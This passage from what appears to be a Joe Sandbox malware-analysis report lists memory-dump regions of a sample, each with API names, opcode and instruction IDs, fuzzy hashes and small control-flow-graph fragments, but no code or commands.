                                                                                                                                                                    • Instruction Fuzzy Hash: 9381BF30E0965C8FDB58EFA8D855AEDBBB0FF55311F10017AD04DDB2A2DA356946CB80

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1750 7ffd9b8bd2f5-7ffd9b8bd3c2 1753 7ffd9b8bd3ea-7ffd9b8bd48d WriteFile 1750->1753 1754 7ffd9b8bd3c4-7ffd9b8bd3e7 1750->1754 1755 7ffd9b8bd495-7ffd9b8bd4f1 1753->1755 1756 7ffd9b8bd48f 1753->1756 1754->1753 1756->1755
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: e2e52c401e75581fd3287de6184f8fd71ca8c34008707791e825e850f7d93292
                                                                                                                                                                    • Instruction ID: 65b0dcbceaad9b2dc83b1e51068db24fb45080cc32a49a7712d47d750aeac56d
                                                                                                                                                                    • Opcode Fuzzy Hash: e2e52c401e75581fd3287de6184f8fd71ca8c34008707791e825e850f7d93292
                                                                                                                                                                    • Instruction Fuzzy Hash: B7610370A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3251DA74A985CF40

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1758 7ffd9b920897-7ffd9b9208a0 1759 7ffd9b9208a2-7ffd9b9208dd 1758->1759 1760 7ffd9b9208ea-7ffd9b9209b2 ResumeThread 1758->1760 1763 7ffd9b9208e0-7ffd9b9208e7 1759->1763 1764 7ffd9b9208df 1759->1764 1767 7ffd9b9209b4 1760->1767 1768 7ffd9b9209ba-7ffd9b920a04 1760->1768 1763->1760 1764->1763 1767->1768
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                    • Opcode ID: fd358be5e9db3bc355a47c68d0d1809801fac28020b581e65e0ee4a454fc9dec
                                                                                                                                                                    • Instruction ID: b93be56b4db8c7b9398157074f5b61259403d799ad263dfbfb56f28c68f4453c
                                                                                                                                                                    • Opcode Fuzzy Hash: fd358be5e9db3bc355a47c68d0d1809801fac28020b581e65e0ee4a454fc9dec
                                                                                                                                                                    • Instruction Fuzzy Hash: 81519E30D0864C8FDB59EFA8D855AEDBBF0EF56310F1041ABD04DD7252DA35A986CB41
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: af5f634460a1149d9e5fe11096e83691bf6ec265289c2c324cdeb79867b87014
                                                                                                                                                                    • Instruction ID: f5214fd8ffecf3dc0a9bb765a3302126e5d8bd9ab98358d7a0b2fcb32b6c3677
                                                                                                                                                                    • Opcode Fuzzy Hash: af5f634460a1149d9e5fe11096e83691bf6ec265289c2c324cdeb79867b87014
                                                                                                                                                                    • Instruction Fuzzy Hash: AD41B03090C68C8FDB99DFA8D859BE9BBF0EF5A310F0441ABD04DD72A2CA745946CB40
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ^
                                                                                                                                                                    • API String ID: 0-1590793086
                                                                                                                                                                    • Opcode ID: bb1694fc6365f7c4b9babb32277825fe0ad95120a7a4ce0d22f97ac36ff2e085
                                                                                                                                                                    • Instruction ID: d21860e68fae6cb3ddb93fad034f03d8d19b1656d4fa0a471ac019a77c6d9015
                                                                                                                                                                    • Opcode Fuzzy Hash: bb1694fc6365f7c4b9babb32277825fe0ad95120a7a4ce0d22f97ac36ff2e085
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41D323F0E06B8AF23976EC38714FCBB49DF50BA5B1A02B7D05D8A1E79C492D4256C5
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 0cef203747826887a08e41f7088ccda23bd26eb70657949a8b948d9d6baa8e18
                                                                                                                                                                    • Instruction ID: 89b60dac854f2017d51610db605dd21c01279430ea664a338751406fbf711618
                                                                                                                                                                    • Opcode Fuzzy Hash: 0cef203747826887a08e41f7088ccda23bd26eb70657949a8b948d9d6baa8e18
                                                                                                                                                                    • Instruction Fuzzy Hash: BF511874918A5C8FDF98DF58C895BE9BBF0FB69310F1042AAD04DE3251DB70A985CB81
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 1622c67426a84a8e4cbc75f17d0200da2ec000eb38dfd708cf2a65f599ff5ae0
                                                                                                                                                                    • Instruction ID: 8f70f2fd79469939e0a91373a5f7c395a71883fae4401cc377d70f5a699053b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1622c67426a84a8e4cbc75f17d0200da2ec000eb38dfd708cf2a65f599ff5ae0
                                                                                                                                                                    • Instruction Fuzzy Hash: E0519C71E09A4E8FDB6DDB98C8A15FCB7B1FF54300F1540BAC41AE76A2DA742A01CB40
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 756761a6220f2e90f19a2c55dc97b048c7255c86f2c4965acf90c3442d247717
                                                                                                                                                                    • Instruction ID: 9fe2085598a3c5b606edd0abc568055a46c083bd0a6da52f41391fd0463d95c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 756761a6220f2e90f19a2c55dc97b048c7255c86f2c4965acf90c3442d247717
                                                                                                                                                                    • Instruction Fuzzy Hash: BEB1D030B09E4A8FE359DF68C4A16A4B7A1FF58300F554179C44EC7E96DBB8B9518B80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0255b61f8ac532e38d69c32dc6bb967d696a6e038411fd52c30db7935fa06676
                                                                                                                                                                    • Instruction ID: f0f04dec6e5aa7599d6f6e45232a4d3efed29e295a2a191ce5a7f9c59a1a6288
                                                                                                                                                                    • Opcode Fuzzy Hash: 0255b61f8ac532e38d69c32dc6bb967d696a6e038411fd52c30db7935fa06676
                                                                                                                                                                    • Instruction Fuzzy Hash: E3B11430B0994E8FE369DF68C0A06B4B7A6FF58320F555179C04EC7A96DB39B951CB80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b9f71e7ea744671fe3520fcee3bfa3cc337430e7db6c8d5520e875587eff06b1
                                                                                                                                                                    • Instruction ID: 559d7ee5a446d9d34911a124bf99cf9ab861624ec3a2d5461dac0abafb902e9f
                                                                                                                                                                    • Opcode Fuzzy Hash: b9f71e7ea744671fe3520fcee3bfa3cc337430e7db6c8d5520e875587eff06b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 69B1C230B1AD4A9FD759DF68C0A06A4B7A1FF58300F55417DC08ECBEA6DB78B9518780
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 973aae27cf8aeea82f82b9c5a01243246973e222fdddb01f8bcd97cff60898a1
                                                                                                                                                                    • Instruction ID: 65d0e0b29244da99e2e5690806f6e6cf7a3ea466f9164ce02244fdcee8924a17
                                                                                                                                                                    • Opcode Fuzzy Hash: 973aae27cf8aeea82f82b9c5a01243246973e222fdddb01f8bcd97cff60898a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 8031C732F0E99E8BF33467A964754B87790AF58320F5A017BC44E468E2DCBE2A556381
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a8130fdb8a50e1eb104af1f46c604adf8105ccbe7acb81967b7bb792cf397d0c
                                                                                                                                                                    • Instruction ID: a0b9afb187ab91b18cda061c91f8def8b47e9858d114918a7ac65856c7f5577c
                                                                                                                                                                    • Opcode Fuzzy Hash: a8130fdb8a50e1eb104af1f46c604adf8105ccbe7acb81967b7bb792cf397d0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 8121E752F0F19B8BF239A5A828754F87F469F51A62F1A02B7C09D860E3DC4D3E415286
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 442b9b3629b588c3aed04dbc8967de332e4e6aee0114c966f2ab17cca76c8e66
                                                                                                                                                                    • Instruction ID: 4c59f21fe5c010318dc9b28f2c23490cb4c8e1fbdb8426df3766862fdc82674b
                                                                                                                                                                    • Opcode Fuzzy Hash: 442b9b3629b588c3aed04dbc8967de332e4e6aee0114c966f2ab17cca76c8e66
                                                                                                                                                                    • Instruction Fuzzy Hash: 17B1BF3061AA058FEB58CF58C4E45B137B1FF49310B9541BDCC5B8B69AD778E982CB81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4b4807b5ba5b860ffb0217c23ce29ddb2c59abd8b49670798c99da3ec8b8dc1a
                                                                                                                                                                    • Instruction ID: 5438c40f7651f9b9f6c85d577afb64fc871f69094940eaf7cdc8452ee2170f25
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4807b5ba5b860ffb0217c23ce29ddb2c59abd8b49670798c99da3ec8b8dc1a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5121FD72F0FB5B86F63953E964350BC5B419F50320F5A0177D44D868F6DCEC264A5282
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b592ff195ac4816ef33ea3681622f3cf34f1003bd4eff2b46235fbe6ef397301
                                                                                                                                                                    • Instruction ID: 8a72f10ae61c720e0e0c252a46e5cb36845fbeb8b5045589a566a6ed516e8a37
                                                                                                                                                                    • Opcode Fuzzy Hash: b592ff195ac4816ef33ea3681622f3cf34f1003bd4eff2b46235fbe6ef397301
                                                                                                                                                                    • Instruction Fuzzy Hash: A3219812F0F59B8AFE7552E41C3297C56496F42F10F1A02B6E44E861E3DC8E3E4163A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7a199def0fafa99fdcd194c86822b99c98e3394f4e3e23274ae492962ffa7f30
                                                                                                                                                                    • Instruction ID: 1df8750ebc30ec2c3721e510f49daf6680c22669c0ae694f302ae6c2e0dca1ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a199def0fafa99fdcd194c86822b99c98e3394f4e3e23274ae492962ffa7f30
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E914830B2DA4A4FD759DBA8C0A06B4B7A1FF45300B0541BDC44EC7A97DB29F952C790
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 457b384499f6ffbebf9f6ecf93f015b994d9167f980dfed709f497966f31ce60
                                                                                                                                                                    • Instruction ID: de034981ef6c6d004f26781b376cadfdd43740f3ff1fe11069db538fd109b72d
                                                                                                                                                                    • Opcode Fuzzy Hash: 457b384499f6ffbebf9f6ecf93f015b994d9167f980dfed709f497966f31ce60
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C816F31B0E60A4FE3789F6A946A57577E6EF45310F12057ED08FD31A3DE2AB9028741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 04112ee1a572de7d60eef2b1eaf1df9ce0edd19d34a8d2785ad2b1aa6693ca9d
                                                                                                                                                                    • Instruction ID: 24c64567ef6853154f91974a1d777149394a200d8b3316e87ef011943bb5cee2
                                                                                                                                                                    • Opcode Fuzzy Hash: 04112ee1a572de7d60eef2b1eaf1df9ce0edd19d34a8d2785ad2b1aa6693ca9d
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B812931B1EE4A4FE3389BA8A4611B57BE0EF42314B16057ED08FC39B2DE7979028741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b29f5da8cc017cb01fe3c2e3fa43b6622d7f36d094aabedbe360137e4204c4bb
                                                                                                                                                                    • Instruction ID: 1dc80ba9b62cd60a5c341a5616e27c18419547457feb4903326e3a13337667ab
                                                                                                                                                                    • Opcode Fuzzy Hash: b29f5da8cc017cb01fe3c2e3fa43b6622d7f36d094aabedbe360137e4204c4bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 35614A3170E48D4FE778DA6888665B837C7FF44310B0602B9D19EC75B2DE1AAB0A87C5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1c6ecdf28026a77a5fad79dc80098caaef49936e63e1c69f9a60aeb9aac654c7
                                                                                                                                                                    • Instruction ID: e55b324d3d3b4d8f0b711d7ba4499305ad09e135845235530252148a3b2f9d83
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c6ecdf28026a77a5fad79dc80098caaef49936e63e1c69f9a60aeb9aac654c7
                                                                                                                                                                    • Instruction Fuzzy Hash: F7614731A0E88D4FE778DA5898665BC37C7EF45310B0602B9E05EC75F2DE1EAA068781
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 97a45e5654285728d65805bf85c39db5b7d2937c77f8c69c8bd3fa2b7276c7bc
                                                                                                                                                                    • Instruction ID: f0375284553d1fc0aaf8ce2edfd816292ec6a26080053815a436d31c72975a22
                                                                                                                                                                    • Opcode Fuzzy Hash: 97a45e5654285728d65805bf85c39db5b7d2937c77f8c69c8bd3fa2b7276c7bc
                                                                                                                                                                    • Instruction Fuzzy Hash: DF612530B1DA4A4FD72D8F6894611B9BBA1EF45315B3502BEC0CBC79E3C979A9038381
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6b99b5efdd687a8830973ebbafc34302be8d6ca0d56b3bbfc5597b26cb44db14
                                                                                                                                                                    • Instruction ID: b43bf6ddd001875edd567395cb3ac8e2ac79d459a651e88e4e6eb04eb91d003f
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b99b5efdd687a8830973ebbafc34302be8d6ca0d56b3bbfc5597b26cb44db14
                                                                                                                                                                    • Instruction Fuzzy Hash: FF81E434A1EB0A8FD378CB64C1A55B277E6FF44300B11497DC48AC7AA6DB6AB942C741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 09aff3d7507d9314751385dd452a837a34f67770db02b3b1bed781ec718901d1
                                                                                                                                                                    • Instruction ID: 98e0aca4813169b002ce283115ebc6c97d4bb935a696ad740b6469fe0e0188e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 09aff3d7507d9314751385dd452a837a34f67770db02b3b1bed781ec718901d1
                                                                                                                                                                    • Instruction Fuzzy Hash: 5751223060EF494FE76ACB6898909647BE0EF5632071A02BED08DC75B3D939AC47C781
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 844ea30450c0644821a8aa14d196dadb778e20ff6bc7926fc037651106f5df2e
                                                                                                                                                                    • Instruction ID: cf65bf5a39208f30452c8d8d6bce971133dde9db62db0042d48928911284f1c8
                                                                                                                                                                    • Opcode Fuzzy Hash: 844ea30450c0644821a8aa14d196dadb778e20ff6bc7926fc037651106f5df2e
                                                                                                                                                                    • Instruction Fuzzy Hash: 98819E30A1AF4B8FD368CB54C5A457177A1FF44304B214A7DC48AC7EA2CBBAB942CB41
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: cbd082f77e7dde83e15feb4649997e740d23dbdc8d115eaae59761f98ab3ba35
                                                                                                                                                                    • Instruction ID: 9e60573a2f30392ce67ad3134d896758e6f72be8e58263b458d6e620a00e5162
                                                                                                                                                                    • Opcode Fuzzy Hash: cbd082f77e7dde83e15feb4649997e740d23dbdc8d115eaae59761f98ab3ba35
                                                                                                                                                                    • Instruction Fuzzy Hash: C561FB30E1E54E8FE7A5DBA488606BD77B6FF55384F1504BAD00EC71E2EE3A6A418701
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    • Instruction Fuzzy Hash: ED41713260CD498FDF98EF18D4A5DA5B3E1FB6831171406AED44AC75A2DE31E885CB81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 951cff3a45bdffd62ac8e5bc086a30faeef90d3b3daefa94ad1d607dbb3d83b3
                                                                                                                                                                    • Instruction ID: 4b803ffabb9d9729ab48ba9a26c54006dc63b50ea8b7f7090dfddc550a0e6c44
                                                                                                                                                                    • Opcode Fuzzy Hash: 951cff3a45bdffd62ac8e5bc086a30faeef90d3b3daefa94ad1d607dbb3d83b3
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31927160C9488FDF5CEF18C465E6473E2FBA835071506ADD04AC72D2DE25E845CF81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4e6c3643cdf5ba53078f816fb61d7e63b2e170c4c8676d57ad840d2ad1e69f2b
